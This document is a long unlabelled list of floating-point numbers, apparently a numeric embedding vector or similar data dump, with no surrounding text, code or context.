0.007310850080102682, -0.02493656612932682, 0.01454274170100689, 0.015734298154711723, -0.00418480671942234, -0.04938502609729767, -0.0031547555699944496, 0.01928025856614113, -0.014600166119635105, -0.009690375998616219, 0.010910645127296448, -0.019969351589679718, 0.011312616057693958, -0.006399237085133791, 0.013760333880782127, -0.026415245607495308, -0.0027617570012807846, 0.026041988283395767, -0.009776512160897255, -0.014313044026494026, 0.014262797310948372, -0.02317076548933983, -0.012676446698606014, -0.0068012080155313015, -0.005903950892388821, -0.039565443992614746, 0.008147093467414379, 0.0165095292031765, -0.0027438118122518063, -0.0017837468767538667, 0.011915572918951511, -0.0026666477788239717, 0.01363830640912056, 0.0044145043939352036, 0.02535289339721203, 0.004191984888166189, -0.01222422905266285, -0.013437320478260517, 0.007052440196275711, 0.0026684424374252558, -0.019151054322719574, -0.003291138680651784, -0.00379719166085124, -0.0004782379837706685, -0.02397470735013485, 0.005577349569648504, 0.012956391088664532, -0.008584954775869846, 0.0008945652516558766, -0.009238158352673054, 0.00849881861358881, -0.0033108782954514027, 0.01597835309803486, -0.012626200914382935, 0.0165095292031765, -0.010063634254038334, 0.014241263270378113, -0.039881277829408646, 0.003404193092137575, 0.0025374428369104862, -0.0013019199250265956, 0.019840147346258163, 0.0004495257744565606, 0.007752300705760717, 0.033277466893196106, -0.029386961832642555, 0.007508246693760157, 0.01949560083448887, -0.026831572875380516, -0.0025500045157969, 0.012626200914382935, 0.005243570078164339, 0.005548637360334396, -0.002846099203452468, -0.005344062577933073, 0.006722249556332827, 0.005763979163020849, 0.007493890356272459, 0.013911073096096516, -0.016753582283854485, 0.0367516465485096, -0.011176233179867268, -0.02360144816339016, -0.004012533463537693, 0.020701514557003975, -0.0008990515489131212, 0.0007137679494917393, -0.006593044381588697, -0.014743726700544357, -0.004629846196621656, -0.01833275519311428, -0.0053691859357059, 0.01662437804043293, 0.012073489837348461, -0.005351240746676922, 0.004141738172620535, 0.024807361885905266, -0.03772786259651184, -0.008584954775869846, -0.003983821254223585, 0.018088702112436295, -0.009245336055755615, -0.009869826957583427, -0.01491600088775158, -0.00905870646238327, -0.011326972395181656, 0.003477768274024129, -0.037153616547584534, -0.017830291762948036, 0.011018316261470318, 0.011850970797240734, -0.00008036057988647372, -0.001927308039739728, 0.00019728438928723335, -0.018734727054834366, 0.003328823484480381, 0.023745009675621986, -0.003779246471822262, -0.010178483091294765, -0.025108840316534042, 0.016538241878151894, 0.013221979141235352, 0.008872076869010925, 0.007981997914612293, -0.008319366723299026, -0.021390607580542564, -0.025654371827840805, -0.006216196343302727, 0.0008918734383769333, -0.022251972928643227, 0.010329222306609154, 0.01491600088775158, -0.022194549441337585, -0.02365887351334095, 0.018146125599741936, 0.004626257345080376, -0.012453927658498287, 0.0002797198831103742, -0.005419432185590267, 0.00021298638603184372, -0.015174410305917263, -0.011527958326041698, 0.015504601411521435, -0.001223858562298119, -0.010910645127296448, -0.006916056852787733, 0.021275758743286133, -0.0003530706453602761, 0.004780585411936045, 0.013157377019524574, -0.005038995295763016, 0.00458318879827857, 0.01457145344465971, 0.017040705308318138, 0.0024118267465382814, -0.007181644905358553, -0.022366821765899658, 0.004116615280508995, 0.001950636738911271, -0.024491528049111366, -0.01220269501209259, -0.028410745784640312, 0.022682657465338707, -0.009116130881011486, 0.003506480483338237, -0.009733444079756737, -0.03735460340976715, 0.0018968012882396579, -0.03873278945684433, 0.006786852143704891, -0.0058106365613639355, 0.007522602565586567, -0.019409462809562683, 0.005412254482507706, -0.0013548580463975668, 0.006148004904389381, -0.015045205131173134, 0.005207679700106382, -0.0020188281778246164, 0.00011069908214267343, -0.01636596769094467, 0.013379896059632301, 0.014585809782147408, -0.004213518928736448, 0.04171886295080185, -0.0067186602391302586, -0.02733403816819191, 0.02051488496363163, -0.022452959790825844, 0.022079700604081154, -0.02307027205824852, -0.022452959790825844, 0.029272112995386124, -0.0034077821765094995, -0.01116187684237957, -0.006546386983245611, 0.004012533463537693, 0.016667446121573448, -0.01597835309803486, 0.011197767220437527, 0.005132310092449188, -0.01124083623290062, -0.01091782283037901, 0.02541031874716282, -0.01111163105815649, -0.009173555299639702, -0.023630160838365555, -0.02045745961368084, -0.03152602165937424, 0.01022872980684042, 0.04034067317843437, 0.019739653915166855, -0.012820008210837841, 0.008735693991184235, -0.042235683649778366, -0.0023382517974823713, -0.0017693907720968127, -0.013710087165236473, -0.029487453401088715, -0.008075312711298466, -0.019797079265117645, -0.024391034618020058, 0.0018339933594688773, -0.012374968267977238, 0.007343151140958071, 0.017571881413459778, -0.007658985909074545, -0.012288832105696201, -0.021002991124987602, 0.002088814275339246, -0.013193267397582531, -0.01503084972500801, 0.005003104917705059, 0.004776996094733477, 0.03904862329363823, 0.026616232469677925, -0.003447261406108737, 0.003883328288793564, 0.003321645548567176, -0.01748574525117874, -0.004023300483822823, -0.015490245074033737, -0.020816363394260406, 0.022467315196990967, 0.003045290242880583, 0.025855358690023422, 0.0049097901210188866, 0.016337255015969276, 0.026343464851379395, 0.0058608828112483025, -0.01576301082968712, -0.013221979141235352, -0.010501495562493801, -0.015404107980430126, -0.00667200330644846, 0.0029017291963100433, -0.013911073096096516, 0.02558259107172489, 0.0012705159606412053, -0.01323633547872305, 0.016595665365457535, -0.02344353124499321, 0.008907967247068882, -0.03195670619606972, 0.0015818640822544694, 0.00575321214273572, 0.015174410305917263, -0.014241263270378113, -0.006284388247877359, -0.005595294758677483, -0.0024656623136252165, -0.004794941283762455, -0.024276185780763626, -0.013329650275409222, 0.023314325138926506, -0.021763866767287254, 0.005799869075417519, -0.004751873202621937, 0.02393163926899433, -0.01576301082968712, -0.01323633547872305, 0.029315181076526642, -0.011664341203868389, 0.01399003155529499, -0.006471017375588417, -0.015533313155174255, 0.0029914549086242914, 0.001875267131254077, -0.0047877635806798935, -0.0161936953663826, 0.006295155268162489, 0.019739653915166855, 0.03442595526576042, 0.022553451359272003, 0.03307648375630379, 0.01534668356180191, -0.01432739943265915, 0.013645484112203121, -0.00956117082387209, -0.013257869519293308, -0.02525240182876587, -0.0026110177859663963, -0.010903467424213886, 0.0036159458104521036, -0.01566251739859581, 0.010444071143865585, 0.019581736996769905, 0.005013871937990189, -0.0017056855140253901, -0.019481243565678596, 0.0022736492101103067, -0.021002991124987602, 0.000060564849263755605, -0.004468339961022139, -0.021591592580080032, -0.008197340182960033, 0.012181160971522331, -0.02045745961368084, 0.01587785966694355, 0.023098984733223915, 0.028066199272871017, -0.016236763447523117, 0.021605947986245155, 0.00242977193556726, 0.01998370885848999, -0.012626200914382935, -0.020443104207515717, -0.011147521436214447, -0.016064489260315895, -0.01137721911072731, -0.018203550949692726, 0.04085749387741089, -0.0034867406357079744, 0.009848292917013168, 0.009238158352673054, -0.016968924552202225, 0.01966787315905094, -0.013408608734607697, -0.023630160838365555, 0.0008483565179631114, -0.0038043695967644453, 0.02670236863195896, -0.00575321214273572, 0.0037325890734791756, 0.007335973437875509, -0.006456661503762007, -0.007113453466445208, 0.014535563066601753, -0.001074913889169693, -0.0011619478464126587, -0.006733016576617956, -0.006535619962960482, 0.022941067814826965, -0.014628877863287926, 0.017270402982831, 0.004174039699137211, 0.016495171934366226, -0.003097331151366234, -0.010149771347641945, -0.004766229074448347, -0.0075369589030742645, -0.0064638396725058556, 0.02717611938714981, -0.012303188443183899, 0.0048057083040475845, 0.0023454297333955765, 0.016423393040895462, 0.00014625288895331323, 0.012726693414151669, 0.002720483345910907, -0.022625232115387917, 0.009489390067756176, 0.0023759366013109684, -0.012360612861812115, 0.018662946298718452, 0.0006141724297776818, 0.013961318880319595, 0.0027491955552250147, -0.038818925619125366, -0.006786852143704891, 0.023371750488877296, 0.0032893442548811436, 0.02924340032041073, 0.031210187822580338, 0.001498419209383428, -0.006453072186559439, -0.0030129889491945505, 0.0033844534773379564, -0.012095024809241295, -0.0004975289921276271, -0.02083071880042553, -0.0005024638958275318, -0.0259989183396101, -0.022941067814826965, -0.0048380098305642605, 0.0141694825142622, 0.012741049751639366, -0.0012283448595553637, -0.01036511268466711, 0.016667446121573448, -0.0036285072565078735, 0.0020331842824816704, -0.008771584369242191, 0.008570599369704723, -0.0053368848748505116, -0.014636056497693062, -0.004213518928736448, -0.0016536446055397391, -0.011915572918951511, 0.0019990885630249977, -0.009015638381242752, -0.0010695303790271282, 0.02173515409231186, -0.022295042872428894, -0.008118381723761559, -0.028898853808641434, -0.02173515409231186, 0.01031486690044403, -0.00876440666615963, -0.02434796653687954, -0.012805651873350143, 0.014198195189237595, -0.003528014523908496, -0.0075872051529586315, 0.01432739943265915, -0.01425561960786581, -0.022094056010246277, -0.0014634261606261134, -0.005196912679821253, -0.038014985620975494, 0.005921896081417799, -0.016495171934366226, -0.010049278847873211, 0.01902184821665287, -0.0003685483243316412, -0.006704304367303848, 0.008276298642158508, -0.014470960944890976, 0.020342610776424408, -0.012719515711069107, 0.0017658018041402102, -0.012884610332548618, -0.0011359273921698332, -0.018777795135974884, 0.00281738699413836, 0.004475518129765987, 0.0010058251209557056, 0.012690803036093712, -0.006377702578902245, -0.03812983259558678, -0.02322818897664547, 0.012073489837348461, -0.00008058489765971899, -0.018404535949230194, 0.0011305438820272684, -0.004220697097480297, -0.0014625289477407932, 0.008427037857472897, 0.011614094488322735, 0.0005818711942993104, 0.00029407598776742816, -0.005286638159304857, -0.0019596093334257603, 0.025453386828303337, 0.0008582263253629208, 0.0068047973327338696, -0.0002250993566121906, 0.015906572341918945, -0.008735693991184235, -0.005293816328048706, 0.0052507477812469006, -0.007694876287132502, 0.009884183295071125, 0.00905870646238327, 0.00011866223940160125, 0.0030901532154530287, 0.018792150542140007, 0.00025594254839234054, 0.012654912658035755, -0.005239980760961771, 0.017413964495062828, 0.00011720419570337981, 0.018461959436535835, 0.016078844666481018, -0.01348038949072361, -0.004220697097480297, -0.01839018054306507, -0.004845187999308109, 0.007795368786901236, 0.008068135008215904, 0.022180194035172462, -0.0025266758166253567, 0.026386534795165062, -0.009015638381242752, -0.02318512089550495, 0.018993135541677475, -0.01478679571300745, -0.012339078821241856, -0.020127268508076668, -0.003490329720079899, -0.0120663121342659, 0.0019757598638534546, -0.003998177126049995, -0.0064100041054189205, 0.006097758654505014, -0.015217478387057781, -0.023242546245455742, -0.0056240069679915905, -0.011140342801809311, 0.003976643085479736, 0.0070416731759905815, 0.0016913294093683362, -0.018232261762022972, -0.009094596840441227, -0.0014912411570549011, 0.0009174452861770988, 0.013272225856781006, 0.006424359977245331, -0.010164127685129642, -0.00828347634524107, -0.00030215131118893623, -0.014959068968892097, 0.010077990591526031, -0.019050560891628265, 0.0062233745120465755, 0.00046657363418489695, 0.0030076054390519857, 0.011987353675067425, 0.01089628878980875, -0.031669583171606064, -0.017815934494137764, 0.009812402538955212, -0.0009744210983626544, -0.007730766199529171, 0.00023867037089075893, 0.012619022279977798, 0.00016565607802476734, 0.017270402982831, -0.010853220708668232, 0.0014661179156973958, -0.022524740546941757, -0.018260974436998367, -0.0180599894374609, 0.00005605052501778118, -0.00788150541484356, -0.028166692703962326, -0.021404962986707687, -0.0050748856738209724, 0.014872931875288486, -0.018605520948767662, 0.006011622026562691, 0.025395961478352547, 0.0033700973726809025, -0.009309939108788967, -0.02892756648361683, -0.004619079176336527, -0.008053778670728207, 0.007088330574333668, -0.0064602503553032875, 0.016552597284317017, 0.014987780712544918, 0.010925001464784145, 0.00009107158257393166, 0.007300083059817553, -0.007795368786901236, -0.004191984888166189, -0.0027761131059378386, -0.008821831084787846, -0.016667446121573448, -0.006862221751362085, 0.0050246394239366055, 0.009388897567987442, 0.004202751908451319, 0.005089241545647383, 0.006237730849534273, -0.0010847836965695024, -0.013315293937921524, -0.013846470043063164, 0.014829863794147968, 0.008168627507984638, -0.012317543849349022, 0.00004172245098743588, 0.01592092774808407, 0.03649323806166649, -0.019581736996769905, 0.012654912658035755, 0.010128237307071686, 0.0018124592024832964, 0.020744582638144493, 0.00927404873073101, -0.012109380215406418, -0.012288832105696201, 0.008592133410274982, 0.004845187999308109, 0.006869399454444647, -0.00798917654901743, -0.014901644550263882, -0.019998064264655113, -0.004579599946737289, 0.0065966336987912655, -0.012547241523861885, 0.017126841470599174, 0.014872931875288486, 0.005405076313763857, -0.015375396236777306, 0.002313128672540188, -0.0005863574333488941, 0.012159626930952072, 0.00020266792853362858, -0.01662437804043293, -0.004924146458506584, -0.0012983308406546712, -0.0021157320588827133, -0.034397244453430176, 0.024204405024647713, 0.01725604757666588, -0.01432739943265915, 0.006248497869819403, 0.002750989980995655, 0.025984562933444977, 0.017500100657343864, -0.0012947418726980686, -0.023529667407274246, 0.006083402317017317, -0.00876440666615963, -0.026817217469215393, -0.01441353652626276, 0.005218446720391512, 0.023802433162927628, -0.002557182451710105, -0.016265474259853363, 0.004956447519361973, 0.011599738150835037, 0.006169539410620928, 0.006693537347018719, -0.0027635516598820686, -0.00001906671059259679, -0.014334578067064285, 0.004694448783993721, -0.03356458991765976, -0.022409891709685326, 0.004870310891419649, -0.000681915320456028, -0.010379469022154808, 0.008850542828440666, 0.0120663121342659, -0.012482639402151108, 0.010544564574956894, 0.010523030534386635, -0.015490245074033737, 0.009489390067756176, 0.006837098393589258, 0.0059326631017029285, -0.00012213911395519972, 0.0011942490236833692, -0.02887014113366604, 0.0028568662237375975, -0.01566251739859581, -0.02855430729687214, -0.002467456739395857, 0.0214767437428236, 0.0034059875179082155, 0.010458427481353283, 0.005186145659536123, 0.005649130325764418, -0.018734727054834366, 0.017543168738484383, 0.012116558849811554, 0.005774746183305979, 0.018605520948767662, -0.02365887351334095, -0.03057851828634739, -0.010709659196436405, 0.02813798002898693, 0.005082063842564821, 0.013695730827748775, -0.0024513062089681625, 0.012166804634034634, -0.021649017930030823, -0.0029394140001386404, 0.013358362019062042, -0.021404962986707687, 0.0033503577578812838, -0.008484462276101112, -0.015260547399520874, -0.011571026407182217, 0.016265474259853363, 0.008505996316671371, -0.00956117082387209, 0.0013979263603687286, 0.005746033973991871, -0.009065885096788406, 0.007436465937644243, -0.009733444079756737, 0.029717152938246727, 0.0017846442060545087, -0.018361467868089676, -0.01874908246099949, 0.00012853206135332584, -0.0058285812847316265, -0.004224285949021578, 0.0004647791211027652, 0.0016572336899116635, -0.03824468329548836, -0.019581736996769905, -0.010307688266038895, 0.012654912658035755, 0.01457145344465971, 0.0037756573874503374, 0.007888684049248695, 0.0035710828378796577, -0.0023005669936537743, -0.003714644117280841, -0.010960891842842102, 0.001497521996498108, -0.002298772567883134, 0.028956277295947075, 0.0007110761944204569, -0.010113880969583988, 0.010221552103757858, 0.009582704864442348, 0.0160357765853405, -0.008383969776332378, 0.010422537103295326, 0.013580881990492344, -0.0010901672067120671, 0.006291565950959921, -0.025970207527279854, -0.0015280286315828562, -0.014592988416552544, -0.0027025381568819284, -0.020658444613218307, -0.010113880969583988, -0.011118808761239052, 0.005807047244161367, -0.020285187289118767, -0.0259989183396101, -0.010178483091294765, -0.013631128706037998, 0.01167151890695095, -0.006076224613934755, -0.012906144373118877, -0.010085168294608593, 0.008829008787870407, -0.0024046488106250763, 0.00616595009341836, -0.024606376886367798, -0.004690859466791153, -0.0010785029735416174, -0.0018573220586404204, -0.017198622226715088, -0.038273394107818604, 0.01353063527494669, -0.024893498048186302, -0.007615917362272739, -0.006636112928390503, 0.008111203089356422, -0.005771156866103411, -0.0006509599625132978, -0.010458427481353283, -0.01790207251906395, 0.008032244630157948, -0.010996782220900059, -0.0004246268654242158, 0.020816363394260406, -0.000363389088306576, 0.00720676826313138, -0.008706982247531414, 0.01592092774808407, -0.003388042561709881, 0.00010772691894089803, -0.012425214983522892, 0.022625232115387917, 0.0011215712875127792, -0.0050461734645068645, 0.025424674153327942, -0.010049278847873211, -0.0065643321722745895, -0.005419432185590267, -0.004916968289762735, -0.04191984608769417, -0.005078474525362253, 0.010042100213468075, -0.004080724902451038, -0.010745549574494362, 0.020644089207053185, -0.007601561490446329, 0.004432449582964182, 0.005990087985992432, -0.0020529241301119328, 0.025697439908981323, -0.0039694649167358875, -0.015963995829224586, 0.006560743320733309, 0.00394075270742178, 0.0027150996029376984, 0.013602416031062603, -0.0017451648600399494, 0.0070093716494739056, -0.001973965438082814, 0.017457032576203346, 0.021074771881103516, -0.01672487147152424, 0.005311761517077684, -0.0026271685492247343, 0.006926823873072863, 0.009381718933582306, -0.010357934981584549, 0.025797933340072632, -0.010745549574494362, 0.010013388469815254, -0.0013539608335122466, 0.0065643321722745895, 0.025295469909906387, 0.00653920928016305, -0.016121914610266685, 0.04527917876839638, 0.011097274720668793, -0.0311240516602993, -0.0025482098571956158, 0.0028120034839957952, 0.0030757971107959747, 0.032961633056402206, 0.009711910039186478, -0.018232261762022972, 0.008929501287639141, 0.011011137627065182, -0.009180733934044838, 0.013164554722607136, -0.009704731404781342, -0.03232996538281441, -0.005968553479760885, 0.011420287191867828, 0.008269120939075947, -0.009776512160897255, -0.0075369589030742645, -0.04252280294895172, 0.03063594363629818, 0.004148916341364384, -0.02350095473229885, 0.010960891842842102, -0.018461959436535835, -0.010063634254038334, -0.0012130914255976677, 0.00745800044387579, -0.030406245961785316, -0.002742017386481166, 0.013595238327980042, -0.005408665165305138, -0.013487567193806171, 0.009073062799870968, -0.007386219687759876, -0.016236763447523117, -0.010781439952552319, -0.0073503293097019196, -0.00812555942684412, -0.02674543671309948, -0.016236763447523117, -0.02482171729207039, 0.03069336712360382, 0.015260547399520874, -0.0025087306275963783, -0.014399180188775063, 0.04306833818554878, -0.026888998225331306, -0.00956117082387209, 0.026357822120189667, 0.009309939108788967, -0.01709812879562378, -0.021002991124987602, -0.006198251619935036, 0.0086352014914155, 0.021189620718359947, 0.004034067504107952, -0.004952858667820692, -0.01890699937939644, 0.030808215960860252, 0.010975247249007225, -0.006130059715360403, -0.006474606692790985, 0.0053655970841646194, 0.018763437867164612, -0.019409462809562683, -0.003994588274508715, 0.015274903737008572, 0.0009187911637127399, -0.001846554921939969, 0.008893611840903759, -0.010185661725699902, 0.0002595316036604345, 0.015303615480661392, -0.01715555414557457, -0.007443644106388092, -0.012676446698606014, 0.025180621072649956, -0.005667075049132109, -0.005021050106734037, -0.0160357765853405, 0.026013275608420372, -0.02983200177550316, 0.00028151439619250596, -0.011894038878381252, 0.016078844666481018, -0.014592988416552544, 0.010379469022154808, 0.014492494985461235, -0.01582043617963791, -0.011011137627065182, 0.00012808344035875052, 0.006191073451191187, -0.02057230845093727, 0.011635628528892994, 0.012008887715637684, 0.01827532984316349, 0.005842937622219324, -0.001667103497311473, 0.0015154670691117644, 0.005663486197590828, -0.01592092774808407, 0.01737089641392231, 0.02839639037847519, 0.011915572918951511, -0.02238117903470993, -0.009424787946045399, 0.018031276762485504, -0.000032273212127620354, -0.028195403516292572, -0.0026792094577103853, 0.010293331928551197, -0.02796570584177971, 0.0029412084259092808, 0.01467912457883358, -0.004023300483822823, -0.009001282043755054, 0.0028532773721963167, 0.0034149601124227047, 0.01646646112203598, -0.014693480916321278, -0.008154272101819515, -0.011542313732206821, 0.016064489260315895, -0.008355257101356983, 0.005724499933421612, 0.0018878286937251687, -0.017614949494600296, -0.0012588516110554338, -0.008240408264100552, 0.004159683361649513, -0.009252514690160751, -0.019194122403860092, -0.0017550346674397588, -0.0073503293097019196, -0.007131398655474186, -0.006309511139988899, -0.018519384786486626, -0.011355685070157051, 0.0035010967403650284, 0.0011529752518981695, -0.0014006182318553329, 0.013315293937921524, 0.016983279958367348, 0.0023041560780256987, -0.03835953027009964, -0.04726032167673111, 0.004532942548394203, -0.02462073229253292, -0.0005177172715775669, -0.0023364571388810873, -0.004902612417936325, 0.006481784395873547, -0.005950608290731907, 0.009597061201930046, 0.0002483158896211535, 0.0011466944124549627, -0.0033790699671953917, 0.007651807740330696, -0.010357934981584549, 0.015145698562264442, -0.024606376886367798, -0.024692513048648834, 0.014341755770146847, -0.022180194035172462, -0.023156408220529556, -0.009869826957583427, 0.023472243919968605, -0.007917395792901516, 0.025166263803839684, -0.001060557784512639, -0.0006087888614274561, 0.015016493387520313, -0.004730339162051678, 0.03106662631034851, -0.007795368786901236, -0.003395220497623086, -0.017916427925229073, 0.005193323362618685, -0.012769761495292187, -0.011477711610496044, -0.0005850115558132529, 0.005613239947706461, 0.017399607226252556, -0.021620305255055428, -0.007709232158958912, 0.0031098928302526474, -0.014104880392551422, 0.025668729096651077, -0.005731677636504173, 0.013157377019524574, -0.02994685061275959, 0.01467912457883358, -0.010286154225468636, 0.004134560469537973, 0.0004643305146601051, 0.02493656612932682, -0.01275540515780449, 0.010659413412213326, -0.03634967654943466, -0.010192839428782463, 0.017815934494137764, -0.019194122403860092, -0.02935824915766716, -0.013329650275409222, -0.0036572194658219814, -0.009317116811871529, 0.020644089207053185, -0.005275871139019728, 0.021821290254592896, -0.007766656577587128, 0.0017218361608684063, 0.004493463318794966, -0.0009977497393265367, -0.005537870340049267, 0.005699376575648785, -0.015418464317917824, -0.006969892419874668, 0.0014176660915836692, 0.009202267974615097, -0.010465606115758419, -0.021649017930030823, -0.0015612271381542087, -0.007443644106388092, 0.0086352014914155, 0.00900846067816019, -0.009525280445814133, 0.008836187422275543, -0.008807474747300148, -0.012619022279977798, -0.005268692970275879, 0.0022790327202528715, 0.010515851899981499, 0.003149372059851885, 0.010027743875980377, 0.002311334013938904, 0.0023382517974823713, 0.004794941283762455, 0.00308297504670918, -0.002259293105453253, -0.010688125155866146, -0.0036428633611649275, 0.012741049751639366, 0.016322899609804153, 0.004066368564963341, 0.004536531399935484, 0.0029573591891676188, -0.0022700601257383823, 0.016121914610266685, -0.002996838418766856, -0.0007021035999059677, 0.01481550745666027, 0.0070596178993582726, -0.016983279958367348, -0.000018856417227652855, 0.02340046316385269, 0.006209018640220165, 0.01268362533301115, 0.030980490148067474, 0.004629846196621656, 0.010881933383643627, -0.0059326631017029285, 0.006108525674790144, 0.022352466359734535, -0.0008775173337198794, 0.00039927937905304134, -0.024807361885905266, -0.009877005591988564, -0.004934913478791714, -0.010716837830841541, -0.01747138798236847, 0.004285299684852362, 0.013631128706037998, 0.015260547399520874, -0.011262370273470879, -0.029071126133203506, -0.006065457593649626, -0.013674196787178516, -0.02210841327905655, -0.007321617100387812, -0.027262257412075996, 0.006209018640220165, 0.009604238905012608, 0.02963101491332054, -0.017069417983293533, 0.0019972941372543573, 0.008312189020216465, 0.004985159728676081, 0.012898966670036316, -0.004945680499076843, 0.0014436865458264947, 0.0037900134921073914, 0.01388236042112112, 0.0024064432363957167, -0.009108953177928925, -0.004597545135766268, 0.02690335363149643, 0.01547588873654604, -0.003032728796824813, 0.006528441794216633, -0.0078599713742733, -0.011298260651528835, 0.008513174019753933, -0.002720483345910907, -0.0010587632423266768, -0.013035349547863007, -0.020974280312657356, 0.004202751908451319, -0.009195090271532536, -0.011448999866843224, 0.0015073918038979173, -0.011413109488785267, 0.004468339961022139, 0.025654371827840805, 0.030147835612297058, 0.002158800372853875, -0.006320278160274029, 0.00016823569603729993, 0.0067007155157625675, -0.002855071797966957, -0.016825363039970398, 0.021218333393335342, 0.012274475768208504, -0.0037433563265949488, -0.004927735310047865, -0.0011404136894270778, 0.01465041283518076, 0.013609594665467739, -0.003626712830737233, -0.010171305388212204, -0.01222422905266285, -0.002253909595310688, 0.010587632656097412, -0.0034364943858236074, 0.012374968267977238, -0.007450822275131941, -0.00908024050295353, -0.009510924108326435, -0.002381320111453533, 0.003648247104138136, -0.010824508965015411, 0.013444499112665653, 0.013200445100665092, -0.0018007948528975248, 0.02222326211631298, 0.0035028913989663124, 0.010192839428782463, 0.006499729584902525, -0.011355685070157051, 0.005498391110450029, -0.01890699937939644, 0.013387074694037437, 0.003976643085479736, 0.011391574516892433, 0.0006132751586847007, 0.010910645127296448, 0.006079813465476036, 0.02114655263721943, -0.020701514557003975, 0.0008182983729057014, 0.01721297763288021, 0.015203122980892658, 0.012030421756207943, -0.0027007434982806444, -0.006449483335018158, -0.001186173758469522, 0.013997209258377552, 0.0028443047776818275, -0.016107557341456413, -0.010673769749701023, -0.02845381386578083, -0.0021534168627113104, -0.003825903870165348, 0.001304611680097878, 0.0051000090315938, -0.006998604629188776, 0.014987780712544918, -0.0010578660294413567, 0.0026433190796524286, 0.009051528759300709, 0.01430586539208889, -0.0031045093201100826, -0.0012965364148840308, -0.016208050772547722, -0.015217478387057781, -0.00707397423684597, -0.011039850302040577, -0.015404107980430126, 0.014392002485692501, 0.0059649646282196045, -0.01248981710523367, 0.0023167175240814686, 0.016452103853225708, -0.009496567770838737, 0.003418549196794629, 0.020012419670820236, -0.001889623235911131, -0.014363289810717106, -0.006829920224845409, -0.027405818924307823, -0.023859858512878418, -0.010085168294608593, 0.00287660607136786, -0.020184693858027458, -0.004113025963306427, 0.00281738699413836, 0.006237730849534273, 0.026759792119264603, -0.0009174452861770988, 0.014901644550263882, 0.004672914277762175, -0.0038223147857934237, 0.012762583792209625, -0.006219785660505295, 0.009073062799870968, 0.026357822120189667, -0.005505568813532591, 0.003432905301451683, -0.010042100213468075, 0.010752728208899498, 0.025553880259394646, 0.01609320193529129, -0.006259264890104532, 0.0053691859357059, -0.019854502752423286, -0.005082063842564821, -0.018418891355395317, -0.010774262249469757, 0.001096448046155274, 0.01324351318180561, 0.0024656623136252165, -0.007436465937644243, -0.00044212338980287313, 0.013186088763177395, 0.008771584369242191, -0.015963995829224586, 0.012762583792209625, 0.011441821232438087, -0.005196912679821253, 0.001882445183582604, 0.02114655263721943, -0.013954141177237034, -0.023299969732761383, -0.0025033471174538136, -0.025166263803839684, 0.006399237085133791, 0.015648161992430687, -0.01699763722717762, -0.012561597861349583, 0.0269177109003067, -0.03399527445435524, 0.007052440196275711, 0.011621273122727871, 0.015361039899289608, 0.03933574631810188, 0.003380864392966032, -0.014973425306379795, 0.0025500045157969, -0.02151981182396412, 0.0034634119365364313, -0.009848292917013168, 0.01188686117529869, -0.014829863794147968, -0.013566525653004646, -0.020428746938705444, 0.001497521996498108, -0.0012705159606412053, 0.004306833725422621, 0.001889623235911131, 0.0029196743853390217, -0.0021193211432546377, -0.023213833570480347, 0.030836928635835648, -0.006607400719076395, -0.011097274720668793, 0.015332328155636787, -0.024103911593556404, 0.01414794847369194, 0.016954569146037102, 0.00038649345515295863, -0.018131770193576813, 0.007608739193528891, 0.031095338985323906, -0.009309939108788967, 0.0056742532178759575, 0.0011143932351842523, 0.01372444350272417, -0.008721337653696537, 0.014456604607403278, 0.008448571898043156, -0.013695730827748775, 0.007924573495984077, 0.011448999866843224, -0.008312189020216465, 0.009704731404781342, -0.005412254482507706, 0.015045205131173134, -0.0006536517175845802, -0.002311334013938904, -0.01060198899358511, 0.0014741932973265648, 0.035402171313762665, 0.008053778670728207, -0.006729427725076675, -0.021505456417798996, 0.011685875244438648, 0.02183564566075802, 0.011786367744207382, 0.023888571187853813, 0.008663913235068321, -0.01748574525117874, -0.01454991940408945, 0.00011641909804893658, -0.009173555299639702, -0.010142593644559383, 0.004536531399935484, 0.01582043617963791, -0.03006169945001602, -0.008197340182960033, 0.010350757278501987, 0.001972171012312174, 0.005394309293478727, 0.007357507478445768, 0.002106759464368224, 0.01625111885368824, -0.02945874258875847, -0.004820064641535282, 0.030980490148067474, 0.026070699095726013, 0.0006056484999135137, -0.028482526540756226, 0.018505029380321503, -0.013889538124203682, -0.011736121959984303, 0.022295042872428894, -0.005954197607934475, 0.022510383278131485, -0.012446749024093151, -0.004066368564963341, -0.005035406444221735, 0.007134987507015467, -0.011183410882949829, -0.0020493350457400084, -0.006399237085133791, -0.004199162591248751, -0.006241319701075554, 0.0025930728297680616, -0.006144416052848101, 0.02195049449801445, -0.0019596093334257603, 0.014858576469123363, 0.01630854420363903, 0.005254337098449469, 0.01190839521586895, -0.0025374428369104862, -0.007960463874042034, 0.010278976522386074, -0.0024495115503668785, 0.0049815708771348, 0.007795368786901236, -0.0006464736652560532, -0.0006998604512773454, -0.011011137627065182, -0.006872988771647215, 0.020486172288656235, 0.00523639190942049, 0.01906491629779339, 0.004565243609249592, -0.014564275741577148, -0.010802973993122578, -0.008455749601125717, -0.013580881990492344, -0.012884610332548618, -0.010680947452783585, -0.0047841742634773254, -0.007429288234561682, 0.009396075271070004, -0.0037433563265949488, -0.006851454731076956, -0.01065223477780819, -0.04028325155377388, -0.01180072408169508, 0.003926396835595369, -0.007321617100387812, 0.001956020249053836, 0.0021695673931390047, 0.0269177109003067, 0.008068135008215904, 0.011685875244438648, -0.0036751646548509598, -0.01031486690044403, 0.008441394194960594, -0.005918307229876518, 0.008836187422275543, -0.026142479851841927, -0.02680286206305027, 0.003319850889965892, -0.0256830845028162, -0.00537995295599103, -0.0006051998352631927, 0.00879311840981245, -0.005627595819532871, -0.017141198739409447, 0.00983393657952547, -0.019998064264655113, -0.011728943325579166, -0.007307261228561401, 0.017198622226715088, -0.017916427925229073, 0.011994531378149986, 0.013731621205806732, -0.0036500415299087763, 0.0020295954309403896, 0.05409383028745651, 0.010415359400212765, -0.010788618586957455, -0.02189307101070881, -0.01031486690044403, -0.008326545357704163, -0.025281112641096115, 0.012511352077126503, 0.00590036204084754, -0.02578357793390751, -0.0070596178993582726, -0.008082491345703602, 0.003782835556194186, 0.000845216098241508, -0.0057783350348472595, -0.025970207527279854, 0.012109380215406418, 0.023055916652083397, 0.0010417153825983405, 0.00836243573576212, -0.011499245651066303, -0.016107557341456413, -0.010013388469815254, 0.015303615480661392, -0.005085652694106102, 0.0048882560804486275, 0.012353434227406979, -0.0016025010263547301, 0.015404107980430126, -0.006862221751362085, -0.006198251619935036, -0.02684593014419079, 0.012662091292440891, 0.01592092774808407, -0.013623950071632862, -0.004608312156051397, -0.013853647746145725, 0.019423820078372955, 0.002973509719595313, -0.0071457549929618835, -0.018031276762485504, 0.01297074742615223, 